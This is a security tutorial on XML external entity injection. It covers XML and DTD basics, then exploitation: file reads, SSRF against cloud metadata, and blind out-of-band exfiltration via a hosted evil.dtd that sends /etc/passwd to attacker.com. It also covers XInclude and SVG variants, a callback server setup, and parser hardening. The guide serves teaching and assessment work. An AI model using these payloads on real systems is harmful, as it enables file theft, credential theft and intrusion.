Security Field Guide · XML Attack Surface

XML External Entity
Injection

Step-by-step from XML basics to blind XXE exploitation, SSRF, and remediation. With analogies, payloads, and assessment guidance.

01

XML Basics — Structure & Purpose

XML (eXtensible Markup Language) is a text format for storing and transporting structured data. Unlike HTML, it has no predefined tags — you invent your own.

Think of XML like a labeled shipping crate system. Every item goes in a box, the box has a label, and boxes can contain other boxes. The structure is entirely up to whoever builds the warehouse.
XML Basic structure
<?xml version="1.0" encoding="UTF-8"?>    <!-- XML declaration -->

<order>                                     <!-- root element (exactly ONE) -->
  <customer id="42">                       <!-- element with attribute -->
    <name>Alice</name>
    <email>alice@example.com</email>
  </customer>
  <item qty="3">Widget</item>
</order>

Key Rules

  • One root element only
  • All tags must close
  • Attribute values quoted
  • Tags are case-sensitive
  • Proper nesting required

Common Uses

  • SAML / SSO tokens
  • SOAP web services
  • Office file formats (.docx, .xlsx)
  • SVG images
  • API responses (legacy)
  • Config files (Maven, Android)

Schema

A schema defines what's valid: which elements exist, what types they hold, what's required. Think of it as the blueprint the crate-builder must follow.

Formats: XSD (XML Schema Definition), DTD, RelaxNG.

02

DTD & Entities — The Dangerous Ingredients

A Document Type Definition (DTD) is an older schema format that lives either inside the XML document (internal DTD) or at a URL (external DTD). It defines allowed elements and declares entities — which is where XXE comes from.

An entity is a text macro — like a copy-paste shortcut. You define &company; once, and every time the parser sees it, it substitutes the full value. An external entity fetches that value from a URL or file at parse time.
XMLInternal DTD + entity
<!-- Internal DTD -->
<!DOCTYPE note [
  <!ENTITY author "Alice">
]>

<note>
  Written by &author;   <!-- → "Alice" -->
</note>
XMLExternal entity (XXE vector)
<!DOCTYPE foo [
  <!ENTITY xxe
    SYSTEM "file:///etc/passwd"
  >
]>

<data>&xxe;</data>
<!-- Parser fetches /etc/passwd
     and inlines it here -->
Entity TypeSyntaxSourceXXE Risk
Internal<!ENTITY name "value">Literal string in DTDLow
External (file)<!ENTITY name SYSTEM "file:///...">Local filesystemCritical
External (HTTP)<!ENTITY name SYSTEM "http://...">Remote URLSSRF
Parameter entity<!ENTITY % name SYSTEM "...">Used inside DTD onlyBlind XXE
Character entity&lt; &amp;Built-in XML escapingNone
03

When Does Testing for XXE Make Sense?

XXE is relevant wherever an application parses XML that the attacker influences. It's easy to miss because XML is often hidden.

🎯 High-Yield Targets

  • SOAP endpoints (Content-Type: text/xml)
  • SAML SSO (SAMLResponse, AuthnRequest)
  • File upload: .docx, .xlsx, .svg, .xml
  • APIs accepting application/xml
  • RSS/Atom feed parsers

🔍 Also Check

  • JSON endpoints — try changing Content-Type to XML and re-send
  • PDF generators (often parse SVG/XML internally)
  • Import/export features (data feeds, configs)
  • Mobile apps talking to legacy middleware

📋 Assessment Checklist

  • Identify all XML-accepting endpoints
  • Check Content-Type headers
  • Inspect file upload processing
  • Look for SAML in SSO flows
  • Test JSON endpoints with XML swap
04

How Do XXE Vulnerabilities Arise?

XXE exists because most XML parsers support external entities by default. It's a feature, not a bug — until untrusted input hits it.

Imagine a photocopier that can pull documents from any network share and include them in a printout. That's useful internally. But if a visitor hands you an instruction sheet that says "and include the contents of server/secret-plans.docx on page 3" — you have a problem.
  • Application receives XML

    User-controlled data arrives as XML — directly in the body, inside a SOAP envelope, or embedded in a file upload.

  • Parser processes DOCTYPE without restriction

    The XML parser (libxml2, Xerces, .NET XmlDocument, Java SAXParser, etc.) sees a <!DOCTYPE> declaration and — by default — processes it.

  • External entity is resolved

    The parser fetches the external resource (file, URL) and substitutes it into the document tree.

  • Substituted content ends up in the response

    If the application reflects parsed values (e.g., echoes back a field), the attacker sees the file contents. If not → Blind XXE path.

  • ℹ️
    Root cause in one sentence: The application passes attacker-controlled XML to a parser that has external entity processing enabled, then uses the parsed output.
    05

    Potential Impact & Limitations

    💥 Impact

    • Local file disclosure — read /etc/passwd, app configs, SSH keys, source code
    • SSRF — probe internal network, hit cloud metadata endpoints (169.254.169.254)
    • Blind data exfil — via DNS/HTTP to attacker-controlled server
    • DoS (Billion Laughs) — nested entity expansion exhausts memory
    • RCE — rare, but possible via PHP expect:// wrapper

    ⚠️ Limitations

    • Files containing <, >, & break XML parsing → need out-of-band or CDATA tricks
    • Binary files not readable (not valid XML text)
    • No response reflection → must use blind techniques
    • WAFs may block SYSTEM keyword or <!DOCTYPE
    • Modern parsers (hardened) may have XXE disabled by default
    ⚠️
    CDATA workaround for special characters: Wrap fetched content in a CDATA section via a parameter entity trick (see Blind XXE section) to handle files with XML metacharacters.
    06

    Exploit: Reading Local Files

    The classic flow: inject a DOCTYPE, define an external entity pointing to a local file, reference it in a value the app echoes back.

    1. Find an XML endpoint that reflects input

      Look for a field value in the response that mirrors something you sent. E.g., <username>Alice</username> → response contains "Alice".

    2. Inject a DOCTYPE with external entity

      Prepend (or replace) the DOCTYPE to declare your entity.

    3. Reference the entity in the reflected field

      Put &xxe; where the echoed value was.

    4. Read the response

      The file contents appear where the entity was referenced.

    XML · BURPBasic file read payload
    <?xml version="1.0"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <stockCheck>
      <productId>&xxe;</productId>   <!-- reflected field -->
      <storeId>1</storeId>
    </stockCheck>
    RESPONSE (truncated)What you get back
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    ...

    Other useful file targets:

    FileWhat you get
    /etc/passwdUser list, shells — confirms XXE works
    /etc/hostnameMachine name — useful for SSRF targeting
    /proc/self/environEnvironment variables — often contains secrets
    /proc/self/cmdlineRunning process & args
    ~/.ssh/id_rsaPrivate SSH key
    /var/www/html/config.phpApp source, DB credentials
    C:\Windows\win.iniWindows confirmation payload
    file:///C:/inetpub/wwwroot/web.configIIS config, connection strings
    07

    Exploit: SSRF via XXE

    Instead of file://, use http://. The server's XML parser makes an outbound HTTP request — from inside the network. You can probe internal services, cloud metadata APIs, or anything the server can reach.

    You're standing outside a locked building. You can't enter. But you slip a note under the door saying "call this number for me and read me what they say." XXE SSRF is exactly that: you make the server act as your proxy.
    XMLAWS metadata endpoint via SSRF
    <!DOCTYPE foo [
      <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
    ]>
    <data>&ssrf;</data>
    XMLInternal network port scan (one-by-one)
    <!-- Try systematically; timing difference reveals open vs. closed -->
    <!DOCTYPE foo [
      <!ENTITY ssrf SYSTEM "http://192.168.1.1:8080/">
    ]>
    <data>&ssrf;</data>

    High-Value SSRF Targets

    • 169.254.169.254 — AWS/GCP/Azure metadata
    • http://localhost:8080 — admin panels
    • http://internal-db:5432 — databases
    • http://elasticsearch:9200/_cat/indices
    • http://kubernetes.default.svc — k8s API

    SSRF Indicators

    • Error message mentions connection refused → port closed
    • Timeout → filtered or no route
    • HTTP 200 with content → open & responding
    • Burp Collaborator interaction → confirmed outbound
    08

    Blind XXE — Out-of-Band Exfiltration & Burp Collaborator

    When the application processes XML but never reflects values back, you need out-of-band channels. The payload triggers an outbound connection to a server you control — proving the vulnerability and potentially exfiltrating data.

    You're blind-folded. You can't see what the server reads. But you ask it to shout the file contents out the window — and you're standing outside listening. Burp Collaborator is the listener.

    Step 1 — Confirm Blind XXE with DNS ping

    XMLOOB DNS / HTTP via SYSTEM entity
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "http://YOUR.COLLABORATOR.ID.oastify.com/">
    ]>
    <data>&xxe;</data>
    
    <!-- If Collaborator gets a DNS/HTTP hit → XXE confirmed blind -->
    ℹ️
    Burp Collaborator: Burp Suite Pro → Collaborator tab → "Copy to clipboard" gives you a unique subdomain. Any DNS or HTTP requests to it appear in real time.

    Step 2 — Exfiltrate file data via parameter entities + external DTD

    You can't nest entity references directly in an internal DTD. Instead, host a malicious DTD on your server and fetch it with a parameter entity.

    XML · SEND TO TARGETStep 2a — Payload
    <!DOCTYPE foo [
      <!ENTITY % dtd
        SYSTEM "http://attacker.com/evil.dtd">
      %dtd;
    ]>
    <data>anything</data>
    DTD · HOST ON ATTACKER SERVERStep 2b — evil.dtd
    <!ENTITY % file
      SYSTEM "file:///etc/passwd">
    <!ENTITY % exfil
      "<!ENTITY % send
        SYSTEM 'http://attacker.com/?x=%file;'>">
    %exfil;
    %send;
    ⚠️
    Limitation: Files with XML metacharacters (< > &) break the URL. Wrap with CDATA: use a second parameter entity to construct <![CDATA[ around the file read — or use DNS exfil (hex-encode the data as subdomains).

    Step 3 — Error-based XXE (no OOB needed)

    DTD · evil.dtdTrigger parse error containing file contents
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % error
      "<!ENTITY % boom SYSTEM '%file;/nonexistent'>">
    %error;
    %boom;
    
    <!-- Parser error message contains the file path including
         the file contents — visible in 500 error response -->
    09

    XXE Without Modifying DOCTYPE — XInclude & SVG

    Sometimes you can't inject a DOCTYPE — because you control only part of the XML (e.g., a value inside a SOAP message), or the server regenerates the DOCTYPE. Two alternatives:

    XMLXInclude — inject into a value field
    <!-- No DOCTYPE needed.
         XInclude uses a namespace. -->
    <foo
      xmlns:xi="http://www.w3.org/2001/XInclude">
      <xi:include
        parse="text"
        href="file:///etc/passwd"/>
    </foo>
    ℹ️
    Works when you can inject XML into any value that gets parsed. parse="text" is key — without it, the parser tries to parse the file as XML.
    SVG UploadXXE via SVG image upload
    <?xml version="1.0"?>
    <!DOCTYPE svg [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <svg
      xmlns="http://www.w3.org/2000/svg">
      <text y="20">&xxe;</text>
    </svg>
    
    <!-- Upload as .svg / image/svg+xml
         Content may appear rendered in browser
         or in response if fetched directly -->
    ScenarioTechniqueRequirement
    Full XML body controlClassic DOCTYPE injectionParser allows external entities
    Control a value inside XMLXIncludeServer supports XInclude processing
    File upload (image)SVG with DOCTYPEServer parses SVG as XML
    DOCX/XLSX uploadModify embedded XML partsServer opens/processes the file
    JSON that becomes XMLContent-Type swap + classicBackend converts JSON→XML
    10

    Exploiting XXE with C&C Infrastructure & Tooling

    For blind XXE exfiltration in real engagements, you need an attacker-controlled server for hosting external DTDs and receiving callbacks. Here's a practical workflow using typical ERNW tooling.

    Infrastructure Setup

    BASH · C&C ServerServe evil.dtd + log incoming requests
    # Minimal Python HTTP server that logs all requests
    python3 -m http.server 80
    
    # Or with request logging to file:
    python3 -c "
    import http.server, sys
    class L(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            print(f'[HIT] {self.path}', flush=True)
            self.send_response(200); self.end_headers()
    http.server.HTTPServer(('',80),L).serve_forever()
    "
    BASH · C&C ServerCapture DNS exfil with tcpdump or dnslog
    # Listen for DNS queries (your NS for attacker.com must point here)
    tcpdump -i eth0 -n udp port 53 | grep attacker.com
    
    # Or use interactsh-client (open source Burp Collaborator alternative)
    interactsh-client -v
    # gives you: abc123.oast.fun — use as your callback domain

    Tooling Overview

    ToolUse CaseNotes
    Burp Suite ProIntercept, modify, replay XML; Collaborator for blind OOBGo-to for manual XXE
    Burp CollaboratorDNS/HTTP callback server, auto-correlatedBuilt into Burp Pro; use oastify.com domains
    interactshOpen-source Collaborator alternativeinteractsh-client CLI
    XXEinjectorAutomated XXE file enumeration & OOB exfilRuby; good for bulk file reads
    xmllintParse & test DTD structure locallyxmllint --noent payload.xml
    Python requestsScripted payload deliverySet Content-Type: application/xml

    Full Blind Exfil Workflow

  • Host evil.dtd on C&C

    Place evil.dtd on your C&C server. It reads the target file and sends its contents to your listener as a URL parameter.

  • Send trigger payload to target

    XML body references http://c2.attacker.com/evil.dtd via a parameter entity. Target fetches the DTD.

  • Target evaluates DTD, reads file, sends callback

    Your listener receives GET /?data=root:x:0:0:...%0Adaemon:.... URL-decode the parameter to get the file.

  • Automate with XXEinjector for bulk reads

    ruby XXEinjector.rb --host=c2.attacker.com --file=/burp_request.txt --path=/etc/ --oob=http

  • 11

    Prevention

    Primary fix: disable external entity processing in your XML parser. Everything else is defense-in-depth.

    1. Disable External Entities

    Configure your XML parser to reject external entities and DTD processing. This is the direct fix.

    2. Use Safe Data Formats

    Prefer JSON or YAML for APIs. Less attack surface, no entity concept. Only use XML where necessary.

    3. Server-Side Input Validation

    Validate that XML conforms to expected schema before parsing. Reject documents with DOCTYPE declarations unless required.

    4. Patch & Keep Libraries Current

    XML parser libraries regularly patch XXE-related issues. Run npm audit, mvn dependency-check, etc. regularly.

    Parser-Specific Hardening

    Language / ParserSafe Configuration
    Java (SAXParser) factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
    Java (DocumentBuilder) factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)
    Python (lxml) etree.XMLParser(resolve_entities=False, no_network=True)
    Python (defusedxml) Drop-in safe replacement: import defusedxml.ElementTree as ET
    .NET (XmlReader) XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit }
    PHP (libxml) libxml_disable_entity_loader(true) (PHP < 8.0; disabled by default in 8.0+)
    Node.js (node-expat / libxmljs) Check for resolve_entities: false; prefer sax or validated parsers
    Ruby (Nokogiri) Nokogiri::XML::ParseOptions::NONET | NOENT
    PYTHONSafe XML parsing with defusedxml
    # pip install defusedxml
    import defusedxml.ElementTree as ET
    
    # Any XXE/XInclude/entity bomb attempt raises an exception
    tree = ET.parse("user_input.xml")    # safe drop-in
    root = tree.getroot()
    JAVASecure SAX parser setup
    SAXParserFactory factory = SAXParserFactory.newInstance();
    factory.setFeature(
      "http://apache.org/xml/features/disallow-doctype-decl", true
    );
    factory.setFeature(
      "http://xml.org/sax/features/external-general-entities", false
    );
    factory.setFeature(
      "http://xml.org/sax/features/external-parameter-entities", false
    );
    SAXParser parser = factory.newSAXParser();
    🔗
    OWASP XML Security Cheat Sheetcheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html — comprehensive parser-by-parser reference.
    REF

    Quick Payload Reference

    GoalPayload Skeleton
    Read local file (inline)<!ENTITY x SYSTEM "file:///etc/passwd"> … &x;
    SSRF / internal HTTP<!ENTITY x SYSTEM "http://169.254.169.254/...">
    Blind OOB ping<!ENTITY x SYSTEM "http://collaborator.id/">
    Blind OOB + file exfilParameter entity → external evil.dtd → %file; in URL
    Error-based%file; used in invalid path → error message leaks content
    XInclude (no DOCTYPE)<xi:include parse="text" href="file:///etc/passwd"/>
    SVG uploadSVG with DOCTYPE + <text>&xxe;</text>
    DoS (Billion Laughs)Nested entities: &lol9; expands to 10^9 copies of "lol"